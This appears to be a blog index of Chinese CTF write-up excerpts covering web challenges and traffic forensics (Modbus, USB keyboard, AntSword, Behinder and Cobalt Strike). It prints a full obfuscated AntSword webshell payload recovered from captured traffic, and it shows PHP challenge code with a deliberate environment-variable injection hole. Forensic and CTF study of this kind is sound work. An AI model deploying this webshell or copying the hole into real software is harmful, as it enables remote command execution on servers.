Posts

Web ezhttp 考点:信息泄露+基础发包 访问 /robots.txt 访问 /l0g1n.txt username: XYCTF password: @JOILha!wuigqi123$ 登录 添加Referer头 添加User-Agent 直接burp(fake ip)插件一把梭 添加 Via头 添加 Cookie 可以拿flag ...

Web givenphp 考点:LD_LOAD环镜变量劫持 <?php highlight_file(__FILE__); if(isset($_POST['upload'])){ handleFileUpload($_FILES['file']); } if(isset($_GET['challenge'])){ waf(); $value=$_GET['value']; $key=$_GET['key']; $func=create_function("","putenv('$key=$value');"); if($func==$_GET['guess']){ $func(); system("whoami"); } } function waf() { if(preg_match('/\'|"|%|\(|\)|;|bash/i',$_GET['key'])||preg_match('/\'|"|%|\(|\)|;|bash/i',$_GET['value'])){ die("evil input!!!"); } } function handleFileUpload($file) { $uploadDirectory = '/tmp/'; if ($file['error'] !== UPLOAD_ERR_OK) { echo '文件上传失败。'; return; } $fileExtension = pathinfo($file['name'], PATHINFO_EXTENSION); $newFileName = uniqid('uploaded_file_', true) . '.' . $fileExtension; $destination = $uploadDirectory . $newFileName; if (move_uploaded_file($file['tmp_name'], $destination)) { echo $destination; } else { echo '文件移动失败。'; } } 对直接注入环镜变量进行过滤 ...

Web 菜鸟工具2 如何实现python读内存 1./proc/*/fd/* chroot逃逸 2.利用python实现读取内存 依靠 python 解析自身进程的内存 法一 ctypes 是 Python 的一个标准库模块，它提供了 C 兼容的数据类型，并允许调用共享库中的函数 处理指针：ctypes 允许你在 Python 中操作指针，包括创建、读取和修改指针的值 参考链接： L3HCTF Just a pyjail ...

题目附件给了 modbus.pcap 存在多个协议 但是这道题多半是 考 modbus 会发现 每次的 Query 末尾的两个字符 存在规律 猜测是base家族 可以尝试提取流量中的数据 其中Word Count字段中的22871 是10进制转16进制在转ascii字符串 先提取 过滤器判断字段 tshark -r modbus.pcap -Y "modbus" -T json > 1.json tshark -r modbus.pcap -Y "modbus" -T json -e modbus.word_cnt > 2.json 当作字典正常提取即可 以为部分不存在 modbus.word_cnt字段 用 try-catch 处理 异常空白 ...

还是从第一个 URB向后看 发现 同时 存在 2.8.1 2.10.1 2.4.1 但是显然 2.4.1 是7个字节 不满足 usb流量要求 只考虑 2.8.1 和 2.10.1 tshark -r ez_usb.pcapng -T json -Y "usb.src == \"2.8.1\"" -e usbhid.data > 281.json 正常取数据即可 import json with open('281.json') as f: data = json.load(f) a=[] for i in data: try: a.append(i['_source']['layers']['usbhid.data'][0]) except: continue #键盘流量 normalKeys = {"04":"a", "05":"b", "06":"c", "07":"d", "08":"e", "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j", "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o", "13":"p", "14":"q", "15":"r", "16":"s", "17":"t", "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y", "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4", "22":"5", "23":"6","24":"7","25":"8","26":"9","27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\","32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".","38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"} shiftKeys = {"04":"A", "05":"B", "06":"C", "07":"D", "08":"E", "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J", "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O", "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T", "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y", "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$", "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":"\"","34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"} nums = [] for line in a: if len(line)!=16: # 鼠标流量的话len改为8 continue nums.append(line[0:2]+line[4:6]) #????????×??? print(nums) output = [] for n in nums: if n[2:4] == "00" : continue if n[2:4] in normalKeys: if n[0:2]=="02": output.append(shiftKeys[n[2:4]]) else : output.append(normalKeys[n[2:4]]) else: output += '[unknown]' print(output) flag=0 for i in range(len(output)): try: a=output.index('<DEL>') del output[a] del output[a-1] except: pass for i in range(len(output)): try: if output[i]=="<CAP>": flag+=1 output.pop(i) if flag==2: flag=0 if flag!=0: output[i]=output[i].upper() except: pass print ('output :' + "".join(output)) ...

请求中可以确定是http POST流量 同时可以判断是 蚁剑的流量 进一步过滤 http.request.method =="POST" 直接追踪其tcp流 得到 列举部分 @eVAl(cHr(0x40).ChR(0x69).ChR(0x6e).ChR(0x69).ChR(0x5f).ChR(0x73).ChR(0x65).ChR(0x74).ChR(0x28) 直接输出一下 内容 <?php echo(cHr(0x40).ChR(0x69).ChR(0x6e).ChR(0x69).ChR(0x5f).ChR(0x73).ChR(0x65).ChR(0x74).ChR(0x28).ChR(0x22).ChR(0x64).ChR(0x69).ChR(0x73).ChR(0x70).ChR(0x6c).ChR(0x61).ChR(0x79).ChR(0x5f).ChR(0x65).ChR(0x72).ChR(0x72).ChR(0x6f).ChR(0x72).ChR(0x73).ChR(0x22).ChR(0x2c).ChR(0x20).ChR(0x22).ChR(0x30).ChR(0x22).ChR(0x29).ChR(0x3b).ChR(0x40).ChR(0x73).ChR(0x65).ChR(0x74).ChR(0x5f).ChR(0x74).ChR(0x69).ChR(0x6d).ChR(0x65).ChR(0x5f).ChR(0x6c).ChR(0x69).ChR(0x6d).ChR(0x69).ChR(0x74).ChR(0x28).ChR(0x30).ChR(0x29).ChR(0x3b).ChR(0x66).ChR(0x75).ChR(0x6e).ChR(0x63).ChR(0x74).ChR(0x69).ChR(0x6f).ChR(0x6e).ChR(0x20).ChR(0x61).ChR(0x73).ChR(0x65).ChR(0x6e).ChR(0x63).ChR(0x28).ChR(0x24).ChR(0x6f).ChR(0x75).ChR(0x74).ChR(0x29).ChR(0x7b).ChR(0x40).ChR(0x73).ChR(0x65).ChR(0x73).ChR(0x73).ChR(0x69).ChR(0x6f).ChR(0x6e).ChR(0x5f).ChR(0x73).ChR(0x74).ChR(0x61).ChR(0x72).ChR(0x74).ChR(0x28).ChR(0x29).ChR(0x3b).ChR(0x24).ChR(0x6b).ChR(0x65).ChR(0x79).ChR(0x3d).ChR(0x27).ChR(0x66).ChR(0x35).ChR(0x30).ChR(0x34).ChR(0x35).ChR(0x62).ChR(0x30).ChR(0x35).ChR(0x61).ChR(0x62).ChR(0x65).ChR(0x36).ChR(0x65).ChR(0x63).ChR(0x39).ChR(0x62).ChR(0x31).ChR(0x65).ChR(0x33).ChR(0x37).ChR(0x66).ChR(0x61).ChR(0x66).ChR(0x61).ChR(0x38).ChR(0x35).ChR(0x31).ChR(0x66).ChR(0x35).ChR(0x64).ChR(0x65).ChR(0x39).ChR(0x27).ChR(0x3b).ChR(0x72).ChR(0x65).ChR(0x74).ChR(0x75).ChR(0x72).ChR(0x6e).ChR(0x20).ChR(0x40).ChR(0x62).ChR(0x61).ChR(0x73).ChR(0x65).ChR(0x36).ChR(0x34).ChR(0x5f).ChR(0x65).ChR(0x6e).ChR(0x63).ChR(0x6f).ChR(0x64).ChR(0x65).ChR(0x28).ChR(0x6f).ChR(0x70).ChR(0x65).ChR(0x6e).ChR(0x73).ChR(0x73).ChR(0x6c).ChR(0x5f).ChR(0x65).ChR(0x6e).ChR(0x63).ChR(0x72).ChR(0x79).ChR(0x70).ChR(0x74).ChR(0x28).ChR(0x62).ChR(0x61).ChR(0x73).ChR(0x65).ChR(0x36).ChR(0x34).ChR(0x5f).ChR(0x65).ChR(0x6e).ChR(0x63).ChR(0x6f).ChR(0x64).ChR(0x65).ChR(0x28).ChR(0x24).ChR(0x6f).ChR(0x75).ChR(0x74).ChR(0x29).ChR(0x2c).ChR(0x20).ChR(0x27).ChR(0x41).ChR(0x45).ChR(0x53).ChR(0x2d).ChR(0x31).ChR(0x32).ChR(0x38).ChR(0x2d).ChR(0x45).ChR(0x43).ChR(0x42).ChR(0x27).ChR(0x2c).ChR(0x20).ChR(0x24).ChR(0x6b).ChR(0x65).ChR(0x79).ChR(0x2c).ChR(0x20).ChR(0x4f).ChR(0x50).ChR(0x45).ChR(0x4e).ChR(0x53).ChR(0x53).ChR(0x4c).ChR(0x5f).ChR(0x52).ChR(0x41).ChR(0x57).ChR(0x5f).ChR(0x44).ChR(0x41).ChR(0x54).ChR(0x41).ChR(0x29).ChR(0x29).ChR(0x3b).ChR(0x7d).ChR(0x3b).ChR(0x3b).ChR(0x66).ChR(0x75).ChR(0x6e).ChR(0x63).ChR(0x74).ChR(0x69).ChR(0x6f).ChR(0x6e).ChR(0x20).ChR(0x61).ChR(0x73).ChR(0x6f).ChR(0x75).ChR(0x74).ChR(0x70).ChR(0x75).ChR(0x74).ChR(0x28).ChR(0x29).ChR(0x7b).ChR(0x24).ChR(0x6f).ChR(0x75).ChR(0x74).ChR(0x70).ChR(0x75).ChR(0x74).ChR(0x3d).ChR(0x6f).ChR(0x62).ChR(0x5f).ChR(0x67).ChR(0x65).ChR(0x74).ChR(0x5f).ChR(0x63).ChR(0x6f).ChR(0x6e).ChR(0x74).ChR(0x65).ChR(0x6e).ChR(0x74).ChR(0x73).ChR(0x28).ChR(0x29).ChR(0x3b).ChR(0x6f).ChR(0x62).ChR(0x5f).ChR(0x65).ChR(0x6e).ChR(0x64).ChR(0x5f).ChR(0x63).ChR(0x6c).ChR(0x65).ChR(0x61).ChR(0x6e).ChR(0x28).ChR(0x29).ChR(0x3b).ChR(0x65).ChR(0x63).ChR(0x68).ChR(0x6f).ChR(0x20).ChR(0x22).ChR(0x30).ChR(0x38).ChR(0x39).ChR(0x37).ChR(0x64).ChR(0x22).ChR(0x3b).ChR(0x65).ChR(0x63).ChR(0x68).ChR(0x6f).ChR(0x20).ChR(0x40).ChR(0x61).ChR(0x73).ChR(0x65).ChR(0x6e).ChR(0x63).ChR(0x28).ChR(0x24).ChR(0x6f).ChR(0x75).ChR(0x74).ChR(0x70).ChR(0x75).ChR(0x74).ChR(0x29).ChR(0x3b).ChR(0x65).ChR(0x63).ChR(0x68).ChR(0x6f).ChR(0x20).ChR(0x22).ChR(0x36).ChR(0x30).ChR(0x63).ChR(0x39).ChR(0x37).ChR(0x22).ChR(0x3b).ChR(0x7d).ChR(0x6f).ChR(0x62).ChR(0x5f).ChR(0x73).ChR(0x74).ChR(0x61).ChR(0x72).ChR(0x74).ChR(0x28).ChR(0x29).ChR(0x3b).ChR(0x74).ChR(0x72).ChR(0x79).ChR(0x7b).ChR(0x24).ChR(0x70).ChR(0x3d).ChR(0x62).ChR(0x61).ChR(0x73).ChR(0x65).ChR(0x36).ChR(0x34).ChR(0x5f).ChR(0x64).ChR(0x65).ChR(0x63).ChR(0x6f).ChR(0x64).ChR(0x65).ChR(0x28).ChR(0x24).ChR(0x5f).ChR(0x50).ChR(0x4f).ChR(0x53).ChR(0x54).ChR(0x5b).ChR(0x22).ChR(0x30).ChR(0x78).ChR(0x63).ChR(0x34).ChR(0x36).ChR(0x31).ChR(0x65).ChR(0x38).ChR(0x36).ChR(0x31).ChR(0x39).ChR(0x36).ChR(0x66).ChR(0x31).ChR(0x61).ChR(0x22).ChR(0x5d).ChR(0x29).ChR(0x3b).ChR(0x24).ChR(0x73).ChR(0x3d).ChR(0x62).ChR(0x61).ChR(0x73).ChR(0x65).ChR(0x36).ChR(0x34).ChR(0x5f).ChR(0x64).ChR(0x65).ChR(0x63).ChR(0x6f).ChR(0x64).ChR(0x65).ChR(0x28).ChR(0x24).ChR(0x5f).ChR(0x50).ChR(0x4f).ChR(0x53).ChR(0x54).ChR(0x5b).ChR(0x22).ChR(0x30).ChR(0x78).ChR(0x39).ChR(0x65).ChR(0x63).ChR(0x33).ChR(0x66).ChR(0x61).ChR(0x39).ChR(0x38).ChR(0x61).ChR(0x32).ChR(0x38).ChR(0x33).ChR(0x66).ChR(0x22).ChR(0x5d).ChR(0x29).ChR(0x3b).ChR(0x24).ChR(0x64).ChR(0x3d).ChR(0x64).ChR(0x69).ChR(0x72).ChR(0x6e).ChR(0x61).ChR(0x6d).ChR(0x65).ChR(0x28).ChR(0x24).ChR(0x5f).ChR(0x53).ChR(0x45).ChR(0x52).ChR(0x56).ChR(0x45).ChR(0x52).ChR(0x5b).ChR(0x22).ChR(0x53).ChR(0x43).ChR(0x52).ChR(0x49).ChR(0x50).ChR(0x54).ChR(0x5f).ChR(0x46).ChR(0x49).ChR(0x4c).ChR(0x45).ChR(0x4e).ChR(0x41).ChR(0x4d).ChR(0x45).ChR(0x22).ChR(0x5d).ChR(0x29).ChR(0x3b).ChR(0x24).ChR(0x63).ChR(0x3d).ChR(0x73).ChR(0x75).ChR(0x62).ChR(0x73).ChR(0x74).ChR(0x72).ChR(0x28).ChR(0x24).ChR(0x64).ChR(0x2c).ChR(0x30).ChR(0x2c).ChR(0x31).ChR(0x29).ChR(0x3d).ChR(0x3d).ChR(0x22).ChR(0x2f).ChR(0x22).ChR(0x3f).ChR(0x22).ChR(0x2d).ChR(0x63).ChR(0x20).ChR(0x5c).ChR(0x22).ChR(0x7b).ChR(0x24).ChR(0x73).ChR(0x7d).ChR(0x5c).ChR(0x22).ChR(0x22).ChR(0x3a).ChR(0x22).ChR(0x2f).ChR(0x63).ChR(0x20).ChR(0x5c).ChR(0x22).ChR(0x7b).ChR(0x24).ChR(0x73).ChR(0x7d).ChR(0x5c).ChR(0x22).ChR(0x22).ChR(0x3b).ChR(0x24).ChR(0x72).ChR(0x3d).ChR(0x22).ChR(0x7b).ChR(0x24).ChR(0x70).ChR(0x7d).ChR(0x20).ChR(0x7b).ChR(0x24).ChR(0x63).ChR(0x7d).ChR(0x22).ChR(0x3b).ChR(0x66).ChR(0x75).ChR(0x6e).ChR(0x63).ChR(0x74).ChR(0x69).ChR(0x6f).ChR(0x6e).ChR(0x20).ChR(0x66).ChR(0x65).ChR(0x28).ChR(0x24).ChR(0x66).ChR(0x29).ChR(0x7b).ChR(0x24).ChR(0x64).ChR(0x3d).ChR(0x65).ChR(0x78).ChR(0x70).ChR(0x6c).ChR(0x6f).ChR(0x64).ChR(0x65).ChR(0x28).ChR(0x22).ChR(0x2c).ChR(0x22).ChR(0x2c).ChR(0x40).ChR(0x69).ChR(0x6e).ChR(0x69).ChR(0x5f).ChR(0x67).ChR(0x65).ChR(0x74).ChR(0x28).ChR(0x22).ChR(0x64).ChR(0x69).ChR(0x73).ChR(0x61).ChR(0x62).ChR(0x6c).ChR(0x65).ChR(0x5f).ChR(0x66).ChR(0x75).ChR(0x6e).ChR(0x63).ChR(0x74).ChR(0x69).ChR(0x6f).ChR(0x6e).ChR(0x73).ChR(0x22).ChR(0x29).ChR(0x29).ChR(0x3b).ChR(0x69).ChR(0x66).ChR(0x28).ChR(0x65).ChR(0x6d).ChR(0x70).ChR(0x74).ChR(0x79).ChR(0x28).ChR(0x24).ChR(0x64).ChR(0x29).ChR(0x29).ChR(0x7b).ChR(0x24).ChR(0x64).ChR(0x3d).ChR(0x61).ChR(0x72).ChR(0x72).ChR(0x61).ChR(0x79).ChR(0x28).ChR(0x29).ChR(0x3b).ChR(0x7d).ChR(0x65).ChR(0x6c).ChR(0x73).ChR(0x65).ChR(0x7b).ChR(0x24).ChR(0x64).ChR(0x3d).ChR(0x61).ChR(0x72).ChR(0x72).ChR(0x61).ChR(0x79).ChR(0x5f).ChR(0x6d).ChR(0x61).ChR(0x70).ChR(0x28).ChR(0x27).ChR(0x74).ChR(0x72).ChR(0x69).ChR(0x6d).ChR(0x27).ChR(0x2c).ChR(0x61).ChR(0x72).ChR(0x72).ChR(0x61).ChR(0x79).ChR(0x5f).ChR(0x6d).ChR(0x61).ChR(0x70).ChR(0x28).ChR(0x27).ChR(0x73).ChR(0x74).ChR(0x72).ChR(0x74).ChR(0x6f).ChR(0x6c).ChR(0x6f).ChR(0x77).ChR(0x65).ChR(0x72).ChR(0x27).ChR(0x2c).ChR(0x24).ChR(0x64).ChR(0x29).ChR(0x29).ChR(0x3b).ChR(0x7d).ChR(0x72).ChR(0x65).ChR(0x74).ChR(0x75).ChR(0x72).ChR(0x6e).ChR(0x28).ChR(0x66).ChR(0x75).ChR(0x6e).ChR(0x63).ChR(0x74).ChR(0x69).ChR(0x6f).ChR(0x6e).ChR(0x5f).ChR(0x65).ChR(0x78).ChR(0x69).ChR(0x73).ChR(0x74).ChR(0x73).ChR(0x28).ChR(0x24).ChR(0x66).ChR(0x29).ChR(0x26).ChR(0x26).ChR(0x69).ChR(0x73).ChR(0x5f).ChR(0x63).ChR(0x61).ChR(0x6c).ChR(0x6c).ChR(0x61).ChR(0x62).ChR(0x6c).ChR(0x65).ChR(0x28).ChR(0x24).ChR(0x66).ChR(0x29).ChR(0x26).ChR(0x26).ChR(0x21).ChR(0x69).ChR(0x6e).ChR(0x5f).ChR(0x61).ChR(0x72).ChR(0x72).ChR(0x61).ChR(0x79).ChR(0x28).ChR(0x24).ChR(0x66).ChR(0x2c).ChR(0x24).ChR(0x64).ChR(0x29).ChR(0x29).ChR(0x3b).ChR(0x7d).ChR(0x3b).ChR(0x66).ChR(0x75).ChR(0x6e).ChR(0x63).ChR(0x74).ChR(0x69).ChR(0x6f).ChR(0x6e).ChR(0x20).ChR(0x72).ChR(0x75).ChR(0x6e).ChR(0x63).ChR(0x6d).ChR(0x64).ChR(0x28).ChR(0x24).ChR(0x63).ChR(0x29).ChR(0x7b).ChR(0x24).ChR(0x72).ChR(0x65).ChR(0x74).ChR(0x3d).ChR(0x30).ChR(0x3b).ChR(0x69).ChR(0x66).ChR(0x28).ChR(0x66).ChR(0x65).ChR(0x28).ChR(0x27).ChR(0x73).ChR(0x79).ChR(0x73).ChR(0x74).ChR(0x65).ChR(0x6d).ChR(0x27).ChR(0x29).ChR(0x29).ChR(0x7b).ChR(0x40).ChR(0x73).ChR(0x79).ChR(0x73).ChR(0x74).ChR(0x65).ChR(0x6d).ChR(0x28).ChR(0x24).ChR(0x63).ChR(0x2c).ChR(0x24).ChR(0x72).ChR(0x65).ChR(0x74).ChR(0x29).ChR(0x3b).ChR(0x7d).ChR(0x65).ChR(0x6c).ChR(0x73).ChR(0x65).ChR(0x69).ChR(0x66).ChR(0x28).ChR(0x66).ChR(0x65).ChR(0x28).ChR(0x27).ChR(0x70).ChR(0x61).ChR(0x73).ChR(0x73).ChR(0x74).ChR(0x68).ChR(0x72).ChR(0x75).ChR(0x27).ChR(0x29).ChR(0x29).ChR(0x7b).ChR(0x40).ChR(0x70).ChR(0x61).ChR(0x73).ChR(0x73).ChR(0x74).ChR(0x68).ChR(0x72).ChR(0x75).ChR(0x28).ChR(0x24).ChR(0x63).ChR(0x2c).ChR(0x24).ChR(0x72).ChR(0x65).ChR(0x74).ChR(0x29).ChR(0x3b).ChR(0x7d).ChR(0x65).ChR(0x6c).ChR(0x73).ChR(0x65).ChR(0x69).ChR(0x66).ChR(0x28).ChR(0x66).ChR(0x65).ChR(0x28).ChR(0x27).ChR(0x73).ChR(0x68).ChR(0x65).ChR(0x6c).ChR(0x6c).ChR(0x5f).ChR(0x65).ChR(0x78).ChR(0x65).ChR(0x63).ChR(0x27).ChR(0x29).ChR(0x29).ChR(0x7b).ChR(0x70).ChR(0x72).ChR(0x69).ChR(0x6e).ChR(0x74).ChR(0x28).ChR(0x40).ChR(0x73).ChR(0x68).ChR(0x65).ChR(0x6c).ChR(0x6c).ChR(0x5f).ChR(0x65).ChR(0x78).ChR(0x65).ChR(0x63).ChR(0x28).ChR(0x24).ChR(0x63).ChR(0x29).ChR(0x29).ChR(0x3b).ChR(0x7d).ChR(0x65).ChR(0x6c).ChR(0x73).ChR(0x65).ChR(0x69).ChR(0x66).ChR(0x28).ChR(0x66).ChR(0x65).ChR(0x28).ChR(0x27).ChR(0x65).ChR(0x78).ChR(0x65).ChR(0x63).ChR(0x27).ChR(0x29).ChR(0x29).ChR(0x7b).ChR(0x40).ChR(0x65).ChR(0x78).ChR(0x65).ChR(0x63).ChR(0x28).ChR(0x24).ChR(0x63).ChR(0x2c).ChR(0x24).ChR(0x6f).ChR(0x2c).ChR(0x24).ChR(0x72).ChR(0x65).ChR(0x74).ChR(0x29).ChR(0x3b).ChR(0x70).ChR(0x72).ChR(0x69).ChR(0x6e).ChR(0x74).ChR(0x28).ChR(0x6a).ChR(0x6f).ChR(0x69).ChR(0x6e).ChR(0x28).ChR(0x22).ChR(0xa).ChR(0x22).ChR(0x2c).ChR(0x24).ChR(0x6f).ChR(0x29).ChR(0x29).ChR(0x3b).ChR(0x7d).ChR(0x65).ChR(0x6c).ChR(0x73).ChR(0x65).ChR(0x69).ChR(0x66).ChR(0x28).ChR(0x66).ChR(0x65).ChR(0x28).ChR(0x27).ChR(0x70).ChR(0x6f).ChR(0x70).ChR(0x65).ChR(0x6e).ChR(0x27).ChR(0x29).ChR(0x29).ChR(0x7b).ChR(0x24).ChR(0x66).ChR(0x70).ChR(0x3d).ChR(0x40).ChR(0x70).ChR(0x6f).ChR(0x70).ChR(0x65).ChR(0x6e).ChR(0x28).ChR(0x24).ChR(0x63).ChR(0x2c).ChR(0x27).ChR(0x72).ChR(0x27).ChR(0x29).ChR(0x3b).ChR(0x77).ChR(0x68).ChR(0x69).ChR(0x6c).ChR(0x65).ChR(0x28).ChR(0x21).ChR(0x40).ChR(0x66).ChR(0x65).ChR(0x6f).ChR(0x66).ChR(0x28).ChR(0x24).ChR(0x66).ChR(0x70).ChR(0x29).ChR(0x29).ChR(0x7b).ChR(0x70).ChR(0x72).ChR(0x69).ChR(0x6e).ChR(0x74).ChR(0x28).ChR(0x40).ChR(0x66).ChR(0x67).ChR(0x65).ChR(0x74).ChR(0x73).ChR(0x28).ChR(0x24).ChR(0x66).ChR(0x70).ChR(0x2c).ChR(0x20).ChR(0x32).ChR(0x30).ChR(0x34).ChR(0x38).ChR(0x29).ChR(0x29).ChR(0x3b).ChR(0x7d).ChR(0x40).ChR(0x70).ChR(0x63).ChR(0x6c).ChR(0x6f).ChR(0x73).ChR(0x65).ChR(0x28).ChR(0x24).ChR(0x66).ChR(0x70).ChR(0x29).ChR(0x3b).ChR(0x7d).ChR(0x65).ChR(0x6c).ChR(0x73).ChR(0x65).ChR(0x69).ChR(0x66).ChR(0x28).ChR(0x66).ChR(0x65).ChR(0x28).ChR(0x27).ChR(0x61).ChR(0x6e).ChR(0x74).ChR(0x73).ChR(0x79).ChR(0x73).ChR(0x74).ChR(0x65).ChR(0x6d).ChR(0x27).ChR(0x29).ChR(0x29).ChR(0x7b).ChR(0x40).ChR(0x61).ChR(0x6e).ChR(0x74).ChR(0x73).ChR(0x79).ChR(0x73).ChR(0x74).ChR(0x65).ChR(0x6d).ChR(0x28).ChR(0x24).ChR(0x63).ChR(0x29).ChR(0x3b).ChR(0x7d).ChR(0x65).ChR(0x6c).ChR(0x73).ChR(0x65).ChR(0x7b).ChR(0x24).ChR(0x72).ChR(0x65).ChR(0x74).ChR(0x20).ChR(0x3d).ChR(0x20).ChR(0x31).ChR(0x32).ChR(0x37).ChR(0x3b).ChR(0x7d).ChR(0x72).ChR(0x65).ChR(0x74).ChR(0x75).ChR(0x72).ChR(0x6e).ChR(0x20).ChR(0x24).ChR(0x72).ChR(0x65).ChR(0x74).ChR(0x3b).ChR(0x7d).ChR(0x3b).ChR(0x24).ChR(0x72).ChR(0x65).ChR(0x74).ChR(0x3d).ChR(0x40).ChR(0x72).ChR(0x75).ChR(0x6e).ChR(0x63).ChR(0x6d).ChR(0x64).ChR(0x28).ChR(0x24).ChR(0x72).ChR(0x2e).ChR(0x22).ChR(0x20).ChR(0x32).ChR(0x3e).ChR(0x26).ChR(0x31).ChR(0x22).ChR(0x29).ChR(0x3b).ChR(0x70).ChR(0x72).ChR(0x69).ChR(0x6e).ChR(0x74).ChR(0x20).ChR(0x28).ChR(0x24).ChR(0x72).ChR(0x65).ChR(0x74).ChR(0x21).ChR(0x3d).ChR(0x30).ChR(0x29).ChR(0x3f).ChR(0x22).ChR(0x72).ChR(0x65).ChR(0x74).ChR(0x3d).ChR(0x7b).ChR(0x24).ChR(0x72).ChR(0x65).ChR(0x74).ChR(0x7d).ChR(0x22).ChR(0x3a).ChR(0x22).ChR(0x22).ChR(0x3b).ChR(0x3b).ChR(0x7d).ChR(0x63).ChR(0x61).ChR(0x74).ChR(0x63).ChR(0x68).ChR(0x28).ChR(0x45).ChR(0x78).ChR(0x63).ChR(0x65).ChR(0x70).ChR(0x74).ChR(0x69).ChR(0x6f).ChR(0x6e).ChR(0x20).ChR(0x24).ChR(0x65).ChR(0x29).ChR(0x7b).ChR(0x65).ChR(0x63).ChR(0x68).ChR(0x6f).ChR(0x20).ChR(0x22).ChR(0x45).ChR(0x52).ChR(0x52).ChR(0x4f).ChR(0x52).ChR(0x3a).ChR(0x2f).ChR(0x2f).ChR(0x22).ChR(0x2e).ChR(0x24).ChR(0x65).ChR(0x2d).ChR(0x3e).ChR(0x67).ChR(0x65).ChR(0x74).ChR(0x4d).ChR(0x65).ChR(0x73).ChR(0x73).ChR(0x61).ChR(0x67).ChR(0x65).ChR(0x28).ChR(0x29).ChR(0x3b).ChR(0x7d).ChR(0x3b).ChR(0x61).ChR(0x73).ChR(0x6f).ChR(0x75).ChR(0x74).ChR(0x70).ChR(0x75).ChR(0x74).ChR(0x28).ChR(0x29).ChR(0x3b).ChR(0x64).ChR(0x69).ChR(0x65).ChR(0x28).ChR(0x29).ChR(0x3b)); ?> php代码美化后 ...

考点:冰蝎webshell流量分析+CS4.x流量解密 给了两个 流量包 第一个 ctf1.pcapng 查看其HTTP请求 而在CS中流量特征是基于tls协议 http-beacon 通信中，默认使用 GET 方法向 /dpixel 、/__utm.gif 、/pixel.gif 等地址发起请求，而且下发指令的时候会请求 /submit.php?id=一串数字 ...

直接找 URB的第一个输入协议 我们需要提取的数据 HID Data 提取过滤器 tshark -r usb.pcapng -Y "usb.src==\"2.2.1\"" -T json >1.json 拿 usbhid.data 字段 tshark -r usb.pcapng -Y "usb.src==\"2.2.1\"" -T json -e usbhid.data >2.json 正常当作字典取值 import json with open('./2.json') as f: data = json.load(f) a=[] for i in data: try: a.append(i['_source']['layers']['usbhid.data'][0]) except: continue print(a) ==长度为16位== 按情况要改脚本 直接和 usb流量永存脚本 结合一下 ...